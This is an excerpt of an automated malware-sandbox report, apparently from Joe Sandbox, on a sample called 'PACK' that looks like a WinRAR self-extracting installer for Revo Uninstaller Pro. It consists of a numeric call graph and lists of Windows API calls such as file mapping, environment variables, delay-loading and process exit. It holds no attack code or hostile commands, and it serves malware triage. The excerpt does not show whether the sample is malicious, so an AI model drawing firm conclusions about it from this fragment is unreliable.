SendMessageW 23407->23400 23409 2fb708 MoveFileW 23408->23409 23408->23411 23410 2fb720 MoveFileExW 23409->23410 23409->23411 23410->23411 23411->23398 23411->23400 23411->23405 23411->23406 23411->23407 23412 2fb690 SHFileOperationW 23411->23412 23416 2eb1b7 52 API calls 2 library calls 23411->23416 23417 2ea215 7 API calls 23411->23417 23412->23401 23413->23400 23414->23400 23415->23400 23416->23411 23417->23411 23418->23400 23419->23400 23420->23400 23425 2fcb57 23426 2fcb64 23425->23426 23433 2eda42 23426->23433 23429 2e3e41 _swprintf 51 API calls 23430 2fcb8a SetDlgItemTextW 23429->23430 23436 2fa388 PeekMessageW 23430->23436 23441 2eda70 23433->23441 23437 2fa3dc 23436->23437 23438 2fa3a3 GetMessageW 23436->23438 23439 2fa3b9 IsDialogMessageW 23438->23439 23440 2fa3c8 TranslateMessage DispatchMessageW 23438->23440 23439->23437 23439->23440 23440->23437 23447 2ecf19 23441->23447 23444 2eda6d 23444->23429 23445 2eda93 LoadStringW 23445->23444 23446 2edaaa LoadStringW 23445->23446 23446->23444 23452 2ece52 23447->23452 23449 2ecf36 23450 2ecf4b 23449->23450 23460 2ecf57 26 API calls 23449->23460 23450->23444 23450->23445 23453 2ece6d 23452->23453 23459 2ece66 _strncpy 23452->23459 23454 2ece91 23453->23454 23461 2f11fa WideCharToMultiByte 23453->23461 23456 2ecec2 23454->23456 23462 2ed9dc 50 API calls __vsnprintf 23454->23462 23463 304e71 26 API calls 3 library calls 23456->23463 23459->23449 23460->23450 23461->23454 23462->23456 23463->23459 24898 2e1e54 128 API calls __EH_prolog 24838 2e1050 82 API calls pre_c_initialization 24873 2fb51b 109 API calls 4 library calls 24839 2f6cac 116 API calls 24936 3093b7 31 API calls 2 library calls 24900 2fc2a7 69 API calls 22948 2fd1a4 19 API calls ___delayLoadHelper2@8 22950 2fd7bf 22951 2fd7c9 22950->22951 22954 2fd53a 22951->22954 22982 2fd248 22954->22982 22956 2fd554 22957 2fd5b1 22956->22957 22971 2fd5d5 22956->22971 22993 2fd4b8 11 API calls 3 library calls 22957->22993 22959 2fd5bc RaiseException 22960 2fd7aa 
22959->22960 22962 2fe203 DloadUnlock 5 API calls 22960->22962 22961 2fd64d LoadLibraryExA 22963 2fd6ae 22961->22963 22964 2fd660 GetLastError 22961->22964 22965 2fd7b9 22962->22965 22966 2fd6b9 FreeLibrary 22963->22966 22970 2fd6c0 22963->22970 22967 2fd689 22964->22967 22968 2fd673 22964->22968 22966->22970 22994 2fd4b8 11 API calls 3 library calls 22967->22994 22968->22963 22968->22967 22969 2fd71e GetProcAddress 22973 2fd72e GetLastError 22969->22973 22977 2fd77c 22969->22977 22970->22969 22970->22977 22971->22961 22971->22963 22971->22970 22971->22977 22975 2fd741 22973->22975 22974 2fd694 RaiseException 22974->22960 22975->22977 22995 2fd4b8 11 API calls 3 library calls 22975->22995 22996 2fd4b8 11 API calls 3 library calls 22977->22996 22979 2fd762 RaiseException 22980 2fd248 ___delayLoadHelper2@8 11 API calls 22979->22980 22981 2fd779 22980->22981 22981->22977 22983 2fd27a 22982->22983 22984 2fd254 22982->22984 22983->22956 22997 2fd2f6 8 API calls DloadUnlock 22984->22997 22986 2fd259 22987 2fd275 22986->22987 22998 2fd448 VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 22986->22998 22999 2fd27b GetModuleHandleW GetProcAddress GetProcAddress 22987->22999 22990 2fd505 22991 2fe203 DloadUnlock 5 API calls 22990->22991 22992 2fd536 22991->22992 22992->22956 22993->22959 22994->22974 22995->22979 22996->22960 22997->22986 22998->22987 22999->22990 24842 30aca1 GetProcessHeap 24844 2e94b8 79 API calls 24937 2fafb9 92 API calls _swprintf 24874 2fe1b6 20 API calls 24845 2fa0b0 96 API calls 24938 2f9b8d 72 API calls 24939 310b96 CloseHandle 23360 2e1382 82 API calls 3 library calls 24906 2fda82 38 API calls 2 library calls 24849 301480 6 API calls 3 library calls 24907 2e169e 84 API calls 24850 30e081 21 API calls __vswprintf_c_l 24851 2f589e 123 API calls __vswprintf_c_l 23464 2e1092 23469 2e5a1d 23464->23469 23470 2e5a27 __EH_prolog 23469->23470 23476 2ead1b 23470->23476 23472 2e5a33 23482 2e5c12 GetCurrentProcess 
GetProcessAffinityMask 23472->23482 23477 2ead25 __EH_prolog 23476->23477 23483 2ee6f0 80 API calls 23477->23483 23479 2ead37 23484 2eae33 23479->23484 23483->23479 23485 2eae45 ___scrt_get_show_window_mode 23484->23485 23488 2f05b4 23485->23488 23491 2f0574 GetCurrentProcess GetProcessAffinityMask 23488->23491 23492 2eadad 23491->23492 23492->23472 23494 2fe091 23495 2fe09d ___scrt_is_nonwritable_in_current_image 23494->23495 23520 2fdba6 23495->23520 23497 2fe0a4 23499 2fe0cd 23497->23499 23600 2fe4f5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23497->23600 23508 2fe10c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23499->23508 23531 3077c5 23499->23531 23503 2fe0ec ___scrt_is_nonwritable_in_current_image 23504 2fe16c 23539 2fe610 23504->23539 23508->23504 23601 3067f9 38 API calls 2 library calls 23508->23601 23515 2fe198 23517 2fe1a1 23515->23517 23602 306c00 28 API calls _abort 23515->23602 23603 2fdd1d 13 API calls 2 library calls 23517->23603 23521 2fdbaf 23520->23521 23604 2fe34b IsProcessorFeaturePresent 23521->23604 23523 2fdbbb 23605 3015e6 23523->23605 23525 2fdbc0 23526 2fdbc4 23525->23526 23614 307652 23525->23614 23526->23497 23529 2fdbdb 23529->23497 23534 3077dc 23531->23534 23532 2fe203 DloadUnlock 5 API calls 23533 2fe0e6 23532->23533 23533->23503 23535 307769 23533->23535 23534->23532 23536 307798 23535->23536 23537 2fe203 DloadUnlock 5 API calls 23536->23537 23538 3077c1 23537->23538 23538->23508 23664 2fe920 23539->23664 23542 2fe172 23543 307716 23542->23543 23544 30a7b3 51 API calls 23543->23544 23546 30771f 23544->23546 23545 2fe17b 23548 2fcbb8 23545->23548 23546->23545 23666 30ab3e 38 API calls 23546->23666 23667 2efd49 23548->23667 23552 2fcbd7 23716 2f9aa0 23552->23716 23554 2fcbe0 23720 2f1017 GetCPInfo 23554->23720 23556 2fcbea ___scrt_get_show_window_mode 23557 2fcbfd GetCommandLineW 23556->23557 23558 2fcc0c 23557->23558 23559 
2fcc8a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23557->23559 23760 2fb356 81 API calls 23558->23760 23560 2e3e41 _swprintf 51 API calls 23559->23560 23562 2fccf3 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23560->23562 23723 2fa4f8 LoadBitmapW 23562->23723 23563 2fcc12 23565 2fcc1a OpenFileMappingW 23563->23565 23566 2fcc84 23563->23566 23569 2fcc7a CloseHandle 23565->23569 23570 2fcc33 MapViewOfFile 23565->23570 23762 2fc891 SetEnvironmentVariableW SetEnvironmentVariableW 23566->23762 23569->23559 23572 2fcc44 __vswprintf_c_l 23570->23572 23573 2fcc71 UnmapViewOfFile 23570->23573 23761 2fc891 SetEnvironmentVariableW SetEnvironmentVariableW 23572->23761 23573->23569 23578 2f83fc 8 API calls 23580 2fcd4c DialogBoxParamW 23578->23580 23579 2fcc60 23579->23573 23581 2fcd86 23580->23581 23582 2fcd98 Sleep 23581->23582 23583 2fcd9f 23581->23583 23582->23583 23586 2fcdad 23583->23586 23750 2f9ca1 23583->23750 23585 2fcdcc DeleteObject 23587 2fcde6 23585->23587 23588 2fcde3 DeleteObject 23585->23588 23586->23585 23589 2fce29 23587->23589 23590 2fce17 23587->23590 23588->23587 23758 2f9b08 23589->23758 23591 2fc8f0 3 API calls 23590->23591 23592 2fce1d CloseHandle 23591->23592 23592->23589 23594 2fce63 23595 306b34 GetModuleHandleW 23594->23595 23596 2fe18e 23595->23596 23596->23515 23597 306c5d 23596->23597 23935 3069da 23597->23935 23600->23497 23601->23504 23602->23517 23603->23503 23604->23523 23606 3015eb ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23605->23606 23618 30268e 23606->23618 23609 3015f9 23609->23525 23611 301601 23612 30160c 23611->23612 23632 3026ca DeleteCriticalSection 23611->23632 23612->23525 23660 30acbc 23614->23660 23617 30160f 8 API calls 3 library calls 23617->23526 23619 302697 23618->23619 23621 3026c0 23619->23621 23622 3015f5 23619->23622 23633 302905 23619->23633 23638 3026ca DeleteCriticalSection 23621->23638 23622->23609 23624 301726 23622->23624 23653 30281a 23624->23653 23626 
301730 23631 30173b 23626->23631 23658 3028c8 6 API calls try_get_function 23626->23658 23628 301756 23628->23611 23629 301749 23629->23628 23659 301759 6 API calls ___vcrt_FlsFree 23629->23659 23631->23611 23632->23609 23639 3026f9 23633->23639 23636 30293c InitializeCriticalSectionAndSpinCount 23637 302928 23636->23637 23637->23619 23638->23622 23640 30272d 23639->23640 23643 302729 23639->23643 23640->23636 23640->23637 23641 30274d 23641->23640 23644 302759 GetProcAddress 23641->23644 23643->23640 23643->23641 23646 302799 23643->23646 23645 302769 __crt_fast_encode_pointer 23644->23645 23645->23640 23647 3027c1 LoadLibraryExW 23646->23647 23648 3027b6 23646->23648 23649 3027f5 23647->23649 23650 3027dd GetLastError 23647->23650 23648->23643 23649->23648 23651 30280c FreeLibrary 23649->23651 23650->23649 23652 3027e8 LoadLibraryExW 23650->23652 23651->23648 23652->23649 23654 3026f9 try_get_function 5 API calls 23653->23654 23655 302834 23654->23655 23656 30284c TlsAlloc 23655->23656 23657 30283d 23655->23657 23657->23626 23658->23629 23659->23631 23663 30acd5 23660->23663 23661 2fe203 DloadUnlock 5 API calls 23662 2fdbcd 23661->23662 23662->23529 23662->23617 23663->23661 23665 2fe623 GetStartupInfoW 23664->23665 23665->23542 23666->23546 23668 2fd940 23667->23668 23669 2efd53 GetModuleHandleW 23668->23669 23670 2efdbe 23669->23670 23671 2efd6d GetProcAddress 23669->23671 23674 2f00f3 GetModuleFileNameW 23670->23674 23772 306662 42 API calls __vsnwprintf_l 23670->23772 23672 2efd96 GetProcAddress 23671->23672 23673 2efd86 23671->23673 23672->23670 23675 2efda2 23672->23675 23673->23672 23687 2f010e 23674->23687 23675->23670 23677 2f0031 23677->23674 23678 2f003c GetModuleFileNameW CreateFileW 23677->23678 23679 2f006b SetFilePointer 23678->23679 23680 2f00e7 CloseHandle 23678->23680 23679->23680 23681 2f007b ReadFile 23679->23681 23680->23674 23681->23680 23684 2f009a 23681->23684 23684->23680 23686 2efcfd 2 API calls 23684->23686 23685 2f0143 CompareStringW 
23685->23687 23686->23684 23687->23685 23688 2f0179 GetFileAttributesW 23687->23688 23689 2f018d 23687->23689 23763 2ea995 23687->23763 23766 2efcfd 23687->23766 23688->23687 23688->23689 23690 2f019a 23689->23690 23692 2f01cc 23689->23692 23693 2f01b2 GetFileAttributesW 23690->23693 23694 2f01c6 23690->23694 23691 2f02db 23715 2f95f8 GetCurrentDirectoryW 23691->23715 23692->23691 23695 2ea995 GetVersionExW 23692->23695 23693->23690 23693->23694 23694->23692 23696 2f01e6 23695->23696 23697 2f01ed 23696->23697 23698 2f0253 23696->23698 23700 2efcfd 2 API calls 23697->23700 23699 2e3e41 _swprintf 51 API calls 23698->23699 23701 2f027b AllocConsole 23699->23701 23702 2f01f7 23700->23702 23703 2f0288 GetCurrentProcessId AttachConsole 23701->23703 23704 2f02d3 ExitProcess 23701->23704 23705 2efcfd 2 API calls 23702->23705 23773 302b33 23703->23773 23707 2f0201 23705->23707 23709 2eda42 53 API calls 23707->23709 23708 2f02a9 GetStdHandle WriteConsoleW Sleep FreeConsole 23708->23704 23710 2f021c 23709->23710 23711 2e3e41 _swprintf 51 API calls 23710->23711 23712 2f022f 23711->23712 23713 2eda42 53 API calls 23712->23713 23714 2f023e 23713->23714 23714->23704 23715->23552 23717 2efcfd 2 API calls 23716->23717 23718 2f9ab4 OleInitialize 23717->23718 23719 2f9ad7 GdiplusStartup SHGetMalloc 23718->23719 23719->23554 23721 2f103b IsDBCSLeadByte 23720->23721 23721->23721 23722 2f1053 23721->23722 23722->23556 23724 2fa519 23723->23724 23725 2fa522 GetObjectW 23723->23725 23780 2f963a 12 API calls __vswprintf_c_l 23724->23780 23775 2f952a 23725->23775 23728 2fa520 23728->23725 23730 2fa575 23742 2ecfab 23730->23742 23731 2fa555 23782 2f958c GetDC GetDeviceCaps ReleaseDC 23731->23782 23732 2fa543 23781 2f963a 12 API calls __vswprintf_c_l 23732->23781 23735 2fa54a 23735->23731 23737 2fa550 DeleteObject 23735->23737 23736 2fa55d 23783 2f9549 GetDC GetDeviceCaps ReleaseDC 23736->23783 23737->23731 23739 2fa566 23784 2f975d 8 API calls ___scrt_get_show_window_mode 23739->23784 23741 
2fa56d DeleteObject 23741->23730 23787 2ecfd0 23742->23787 23744 2ecfb7 23827 2ed6c1 GetModuleHandleW FindResourceW 23744->23827 23747 2f83fc 23922 2fd82c 23747->23922 23751 2f9cae 23750->23751 23754 2f9d3c 23751->23754 23931 2f1432 23751->23931 23753 2f9cd6 23753->23754 23934 2f9a8d SetCurrentDirectoryW 23753->23934 23754->23586 23756 2f9ce4 ___scrt_get_show_window_mode 23757 2f9d18 SHFileOperationW 23756->23757 23757->23754 23759 2f9b2e GdiplusShutdown CoUninitialize 23758->23759 23759->23594 23760->23563 23761->23579 23762->23559 23764 2ea9a9 GetVersionExW 23763->23764 23765 2ea9e5 23763->23765 23764->23765 23765->23687 23767 2fd940 23766->23767 23768 2efd0a GetSystemDirectoryW 23767->23768 23769 2efd22 23768->23769 23770 2efd40 23768->23770 23771 2efd33 LoadLibraryW 23769->23771 23770->23687 23771->23770 23772->23677 23774 302b3b 23773->23774 23774->23708 23774->23774 23785 2f9549 GetDC GetDeviceCaps ReleaseDC 23775->23785 23777 2f9531 23778 2f953d 23777->23778 23786 2f958c GetDC GetDeviceCaps ReleaseDC 23777->23786 23778->23730 23778->23731 23778->23732 23780->23728 23781->23735 23782->23736 23783->23739 23784->23741 23785->23777 23786->23778 23788 2ecfde _wcschr __EH_prolog 23787->23788 23789 2ed00d GetModuleFileNameW 23788->23789 23790 2ed03e 23788->23790 23791 2ed027 23789->23791 23829 2e9768 23790->23829 23791->23790 23794 2ed09a 23840 305030 26 API calls 3 library calls 23794->23840 23796 2f3393 76 API calls 23799 2ed06e 23796->23799 23798 2ed0ad 23841 305030 26 API calls 3 library calls 23798->23841 23799->23794 23799->23796 23822 2ed2ba 23799->23822 23801 2ed1f6 23802 2e9a4c 77 API calls 23801->23802 23801->23822 23805 2ed210 ___std_exception_copy 23802->23805 23806 2e9979 80 API calls 23805->23806 23805->23822 23809 2ed239 ___std_exception_copy 23806->23809 23808 2ed0bf 23808->23801 23808->23822 23842 2e9b57 23808->23842 23857 2e9979 23808->23857 23865 2e9a4c 23808->23865 23809->23822 23824 2ed245 ___std_exception_copy 23809->23824 23870 2f0fde 
MultiByteToWideChar 23809->23870 23811 2ed3bb 23871 2ecb33 76 API calls 23811->23871 23813 2ed683 23876 2ecb33 76 API calls 23813->23876 23815 2ed673 23815->23744 23816 2ed3fe 23872 305030 26 API calls 3 library calls 23816->23872 23818 2ed418 23873 305030 26 API calls 3 library calls 23818->23873 23819 2ed3cf 23819->23816 23821 2f3393 76 API calls 23819->23821 23821->23819 23850 2e946e 23822->23850 23823 2f11fa WideCharToMultiByte 23823->23824 23824->23811 23824->23813 23824->23815 23824->23822 23824->23823 23874 2ed9dc 50 API calls __vsnprintf 23824->23874 23875 304e71 26 API calls 3 library calls 23824->23875 23828 2ecfbe 23827->23828 23828->23747 23830 2e9772 23829->23830 23831 2e97f1 CreateFileW 23830->23831 23832 2e9862 23831->23832 23833 2e9811 GetLastError 23831->23833 23835 2e9899 23832->23835 23837 2e987f SetFileTime 23832->23837 23834 2eb32c 2 API calls 23833->23834 23836 2e9831 23834->23836 23835->23799 23836->23832 23838 2e9835 CreateFileW GetLastError 23836->23838 23837->23835 23839 2e9859 23838->23839 23839->23832 23840->23798 23841->23808 23843 2e9b6a 23842->23843 23844 2e9b7b SetFilePointer 23842->23844 23846 2e9bb4 23843->23846 23877 2e6de2 75 API calls 23843->23877 23845 2e9b99 GetLastError 23844->23845 23844->23846 23845->23846 23848 2e9ba3 23845->23848 23846->23808 23848->23846 23878 2e6de2 75 API calls 23848->23878 23851 2e94a3 23850->23851 23852 2e9492 23850->23852 23851->23744 23852->23851 23853 2e949e 23852->23853 23854 2e94a5 23852->23854 23879 2e9621 23853->23879 23884 2e94da 23854->23884 23859 2e9990 23857->23859 23860 2e99e3 23859->23860 23862 2e99f1 23859->23862 23864 2e99f3 23859->23864 23899 2e964a 23859->23899 23911 2e6da8 75 API calls 23860->23911 23862->23808 23863 2e964a 5 API calls 23863->23864 23864->23862 23864->23863 23916 2e9903 23865->23916 23868 2e9a77 23868->23808 23870->23824 23871->23819 23872->23818 23873->23822 23874->23824 23875->23824 23876->23815 23877->23844 23878->23846 23880 2e962e 23879->23880 23881 2e962a 
23879->23881 23880->23881 23890 2e9e18 23880->23890 23881->23851 23885 2e9504 23884->23885 23886 2e94e6 23884->23886 23887 2e9523 23885->23887 23898 2e6c7b 74 API calls 23885->23898 23886->23885 23888 2e94f2 CloseHandle 23886->23888 23887->23851 23888->23885 23891 2fd940 23890->23891 23892 2e9e25 DeleteFileW 23891->23892 23893 2e9e38 23892->23893 23894 2e9648 23892->23894 23895 2eb32c 2 API calls 23893->23895 23894->23851 23896 2e9e4c 23895->23896 23896->23894 23897 2e9e50 DeleteFileW 23896->23897 23897->23894 23898->23887 23900 2e9658 GetStdHandle 23899->23900 23901 2e9663 ReadFile 23899->23901 23900->23901 23902 2e967c 23901->23902 23909 2e969c 23901->23909 23912 2e9745 23902->23912 23904 2e9683 23905 2e96a4 GetLastError 23904->23905 23906 2e96b3 23904->23906 23910 2e9691 23904->23910 23905->23906 23905->23909 23907 2e96c3 GetLastError 23906->23907 23906->23909 23907->23909 23907->23910 23908 2e964a GetFileType 23908->23909 23909->23859 23910->23908 23911->23862 23913 2e974e GetFileType 23912->23913 23914 2e974b 23912->23914 23915 2e975c 23913->23915 23914->23904 23915->23904 23917 2e996e 23916->23917 23920 2e990f 23916->23920 23917->23868 23921 2e6de2 75 API calls 23917->23921 23918 2e9946 SetFilePointer 23918->23917 23919 2e9964 GetLastError 23918->23919 23919->23917 23920->23918 23921->23868 23925 2fd831 ___std_exception_copy 23922->23925 23923 2f841b 23923->23578 23925->23923 23928 306763 7 API calls 2 library calls 23925->23928 23929 2fe2bb RaiseException Concurrency::cancel_current_task new 23925->23929 23930 2fe29e RaiseException Concurrency::cancel_current_task 23925->23930 23928->23925 23933 2f143f 23931->23933 23932 2f1472 CompareStringW 23932->23753 23933->23932 23934->23756 23936 3069e6 _abort 23935->23936 23937 3069fe 23936->23937 23939 306b34 _abort GetModuleHandleW 23936->23939 23957 309931 EnterCriticalSection 23937->23957 23940 3069f2 23939->23940 23940->23937 23972 306b78 GetModuleHandleExW 23940->23972 23941 306aa4 23961 306ae4 23941->23961 
23945 306a7b 23946 306a93 23945->23946 23951 307769 _abort 5 API calls 23945->23951 23952 307769 _abort 5 API calls 23946->23952 23947 306a06 23947->23941 23947->23945 23958 3074e0 23947->23958 23948 306ac1 23964 306af3 23948->23964 23949 306aed 23980 310ec9 5 API calls DloadUnlock 23949->23980 23951->23946 23952->23941 23957->23947 23981 307219 23958->23981 24000 309979 LeaveCriticalSection 23961->24000 23963 306abd 23963->23948 23963->23949 24001 309d6e 23964->24001 23967 306b21 23970 306b78 _abort 8 API calls 23967->23970 23968 306b01 GetPEB 23968->23967 23969 306b11 GetCurrentProcess TerminateProcess 23968->23969 23969->23967 23971 306b29 ExitProcess 23970->23971 23973 306ba2 GetProcAddress 23972->23973 23974 306bc5 23972->23974 23975 306bb7 23973->23975 23976 306bd4 23974->23976 23977 306bcb FreeLibrary 23974->23977 23975->23974 23978 2fe203 DloadUnlock 5 API calls 23976->23978 23977->23976 23979 306bde 23978->23979 23979->23937 23984 3071c8 23981->23984 23983 30723d 23983->23945 23985 3071d4 ___scrt_is_nonwritable_in_current_image 23984->23985 23992 309931 EnterCriticalSection 23985->23992 23987 3071e2 23993 307269 23987->23993 23991 307200 ___scrt_is_nonwritable_in_current_image 23991->23983 23992->23987 23996 307289 23993->23996 23997 307291 23993->23997 23994 2fe203 DloadUnlock 5 API calls 23995 3071ef 23994->23995 23999 30720d LeaveCriticalSection _abort 23995->23999 23996->23994 23997->23996 23998 307a50 _free 20 API calls 23997->23998 23998->23996 23999->23991 24000->23963 24002 309d93 24001->24002 24006 309d89 24001->24006 24003 309990 _abort 5 API calls 24002->24003 24003->24006 24004 2fe203 DloadUnlock 5 API calls 24005 306afd 24004->24005 24005->23967 24005->23968 24006->24004 22909 3098f0 22910 3098fb 22909->22910 22912 309924 22910->22912 22913 309920 22910->22913 22915 309c02 22910->22915 22922 309948 DeleteCriticalSection 22912->22922 22923 309990 22915->22923 22918 309c47 InitializeCriticalSectionAndSpinCount 22919 309c32 22918->22919 22930 

Control-flow Graph

APIs
  • Part of subcall function 002EFD49: GetModuleHandleW.KERNEL32 ref: 002EFD61
  • Part of subcall function 002EFD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002EFD79
  • Part of subcall function 002EFD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002EFD9C
  • Part of subcall function 002F95F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 002F9600
  • Part of subcall function 002F9AA0: OleInitialize.OLE32(00000000), ref: 002F9AB9
  • Part of subcall function 002F9AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002F9AF0
  • Part of subcall function 002F9AA0: SHGetMalloc.SHELL32(003275C0), ref: 002F9AFA
  • Part of subcall function 002F1017: GetCPInfo.KERNEL32(00000000,?), ref: 002F1028
  • Part of subcall function 002F1017: IsDBCSLeadByte.KERNEL32(00000000), ref: 002F103C
• GetCommandLineW.KERNEL32 ref: 002FCC00
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 002FCC27
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 002FCC38
• UnmapViewOfFile.KERNEL32(00000000), ref: 002FCC72
  • Part of subcall function 002FC891: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 002FC8A7
  • Part of subcall function 002FC891: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002FC8E3
• CloseHandle.KERNEL32(00000000), ref: 002FCC7B
• GetModuleFileNameW.KERNEL32(00000000,0033CE18,00000800), ref: 002FCC96
• SetEnvironmentVariableW.KERNEL32(sfxname,0033CE18), ref: 002FCCA8
• GetLocalTime.KERNEL32(?), ref: 002FCCAF
• _swprintf.LIBCMT ref: 002FCCEE
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 002FCD00
• GetModuleHandleW.KERNEL32(00000000), ref: 002FCD03
• LoadIconW.USER32(00000000,00000064), ref: 002FCD1A
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 002FCD6B
• Sleep.KERNEL32(?), ref: 002FCD99
• DeleteObject.GDI32 ref: 002FCDD8
• DeleteObject.GDI32(?), ref: 002FCDE4
                                                                                                                                              • CloseHandle.KERNEL32 ref: 002FCE23
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Program Files\VS Revo Group\Revo Uninstaller Pro$STARTDLG$ps2$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                              • API String ID: 788466649-1595129590
                                                                                                                                              • Opcode ID: 25cdbceed84b76709c05b9ff0bea0f253fb7beb519df1bc5931cdba5eaf7eb34
                                                                                                                                              • Instruction ID: 4d6ea04a4349535d0bc716d4ea95b797e8636a251c785de86e1b6c4ad7c9594b
                                                                                                                                              • Opcode Fuzzy Hash: 25cdbceed84b76709c05b9ff0bea0f253fb7beb519df1bc5931cdba5eaf7eb34
                                                                                                                                              • Instruction Fuzzy Hash: 986128715142096BD323AF60EC89FBBBBACFF49780F104439FA05971A1DB748865CBA1

                                                                                                                                              Control-flow Graph (entry block 2ea2df; legend: Executed / Not Executed; rendered graph not reproduced)
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA314
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA34A
                                                                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA352
                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA37A
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA386
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 869497890-0
                                                                                                                                              • Opcode ID: bb3da9719be7a9083f37c048a0f5850609c16041fe11dd4dbe1556fc635e06bc
                                                                                                                                              • Instruction ID: 97321c7e48f5ae07d9087fe20f5bde9ab580a34936489c49e74df9e8587b6897
                                                                                                                                              • Opcode Fuzzy Hash: bb3da9719be7a9083f37c048a0f5850609c16041fe11dd4dbe1556fc635e06bc
                                                                                                                                              • Instruction Fuzzy Hash: 69418571554385AFC325DF69C880ADBF7E8BB88340F404A2AF599D3241D770A964CB92
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00306AC9,?,0031A800,0000000C,00306C20,?,00000002,00000000), ref: 00306B14
                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00306AC9,?,0031A800,0000000C,00306C20,?,00000002,00000000), ref: 00306B1B
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00306B2D
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                              • Opcode ID: c57ef7db5e5ce7c772459d88e559fbeaa34acb1532ceab76cefc5d476b5daf2e
                                                                                                                                              • Instruction ID: 18eb08adcc3247277bd5ab0582799b3f79f26fa20b540592eda4f845d5cb4eb5
                                                                                                                                              • Opcode Fuzzy Hash: c57ef7db5e5ce7c772459d88e559fbeaa34acb1532ceab76cefc5d476b5daf2e
                                                                                                                                              • Instruction Fuzzy Hash: 4DE0B675001208ABCF136F65DD1AA9A3F6DEB48781F018424FA0A8A172CB35DD62CB90
                                                                                                                                              APIs
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog_memcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3004599000-0
                                                                                                                                              • Opcode ID: f3afc8bed7b9489612c38dece35fcee43ce78d13e43778a7ddbb21306479923e
                                                                                                                                              • Instruction ID: d52df4e5ecd338056ca40e5b68b790f326eb8e0f0983eb9d7f1e46754843a5d7
                                                                                                                                              • Opcode Fuzzy Hash: f3afc8bed7b9489612c38dece35fcee43ce78d13e43778a7ddbb21306479923e
                                                                                                                                              • Instruction Fuzzy Hash: 79820E719641C6AEDF15CF66C885BF977A8BF15300F8840BAEC8D9B142DF315AA4CB60
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002FA5D6
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prologItemTextWindow
                                                                                                                                              • String ID: "%s"%s$,>1$-el -s2 "-d%s" "-sp%s"$<$@$C:\Program Files\VS Revo Group\Revo Uninstaller Pro$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                              • API String ID: 810644672-502532655
                                                                                                                                              • Opcode ID: 0e7799c3c6f9a9c310eb28551c36313df138bea2a9cf3f84a06edab747ba45b8
                                                                                                                                              • Instruction ID: 5089dd0db32284a78b86dad2911515cc47d4245e3d78909d168fd50b48c671b8
